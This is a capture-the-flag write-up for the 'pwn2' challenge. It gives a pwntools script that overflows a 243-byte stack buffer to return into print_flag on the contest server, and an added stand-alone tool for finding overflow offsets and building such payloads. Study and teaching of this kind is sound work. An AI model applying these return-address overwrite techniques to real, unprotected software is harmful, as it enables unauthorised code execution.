pwn2 asks the user to enter a sentence and replies with the same message:
I just love repeating what other people say!
I bet I can repeat anything you tell me!
stardibistengodelmisticosoledeimoscardinideltacamorodimontorsi
stardibistengodelmisticosoledeimoscardinideltacamorodimontorsi
My intuition suggests messing with the length of the input string.
After some trials, I found that with a string longer than 243 characters, the program halts with SIGSEGV.
This time the buffer is long enough to hold shellcode (pwntools' shellcraft would do)… if only the NX bit were disabled.
With NX on, the stack is not executable, so I can't proceed in that direction. Should I use ROP? Why bother: there is a print_flag
function in the binary! NX only stops executing injected code; it does not stop the saved return address from being overwritten with the address of code that is already there, so returning into print_flag is enough. As regards ASLR and the canary, same as pwn1: they are both disabled, so the address is fixed and nothing detects the overwrite.
So, the exploit is:
from pwn import *

OFFSET = 243               # bytes of padding before the saved return address
shell = p32(0x0804854b)    # address of print_flag, packed as a 32-bit little-endian pointer

# padding up to the return address, then the address to return into
# (bytes rather than str so the script also runs on Python 3)
exploit = b'A' * OFFSET + shell

rem = remote('pwn.ctf.tamu.edu', 4322)
rem.sendline(exploit)
rem.interactive()
Flag captured :-D
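The 243-byte offset above was found by trial and error. What follows is an added example, not code from the original write-up, showing the usual way to pin the offset down from a single crash: feed a de Bruijn (cyclic) pattern, read the value that lands in EIP from the debugger or core dump, and look it up in the pattern. The generator is reimplemented with the standard library only (same alphabet and window size as pwntools' cyclic) so it runs offline; the crash value is constructed rather than captured, and the print_flag address is the one used in the exploit. It also checks the finished payload for a newline, since sendline() delivers a line and a 0x0a byte inside the address would cut the input short.

```python
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
SUBSEQ = 4                 # 32-bit target: every 4-byte window of the pattern is unique
PRINT_FLAG = 0x0804854b    # address of print_flag from the write-up (no PIE/ASLR, so it is fixed)


def cyclic(length, alphabet=ALPHABET, n=SUBSEQ):
    """First `length` bytes of the de Bruijn sequence B(len(alphabet), n):
    each n-byte window occurs at exactly one offset (FKM algorithm)."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    class _Done(Exception):
        pass

    def db(t, p):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    if len(out) == length:
                        raise _Done
                    out.append(alphabet[idx])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    try:
        db(1, 1)
    except _Done:
        pass
    return bytes(out)


def offset_from_eip(eip, max_len=4096):
    """Given the value that landed in EIP when the pattern crashed the program,
    return the offset of the saved return address within the input, or -1 if
    the value is not a window of the pattern (i.e. EIP was not taken from our input)."""
    return cyclic(max_len).find(struct.pack("<I", eip))


def build_payload(offset, target):
    """Padding up to the saved return address, then the 32-bit little-endian
    address to return into: the same layout as the exploit in the write-up."""
    return b"A" * offset + struct.pack("<I", target)


def bad_bytes(payload, bad=b"\n"):
    """Offsets of bytes that would truncate the payload on its way in.
    sendline() delivers a line, so a newline inside the payload ends it early;
    add b"\\x00" if the program copies the input with strcpy-style functions."""
    return [i for i, b in enumerate(payload) if b in bad]


# Constructed sample: the EIP value a debugger would report if the program were
# fed cyclic(300) and its saved return address sat 243 bytes into the input.
SAMPLE_CRASH_EIP = struct.unpack("<I", cyclic(300)[243:247])[0]

if __name__ == "__main__":
    offset = offset_from_eip(SAMPLE_CRASH_EIP)
    payload = build_payload(offset, PRINT_FLAG)
    print("offset:", offset, "payload length:", len(payload),
          "bad bytes at:", bad_bytes(payload))
```

In practice you send cyclic(300) instead of the 'A's, read EIP from the SIGSEGV (gdb, or the core file), and pass it to offset_from_eip; a result of 243 reproduces the OFFSET used above, and -1 means the crash came from somewhere other than the return address.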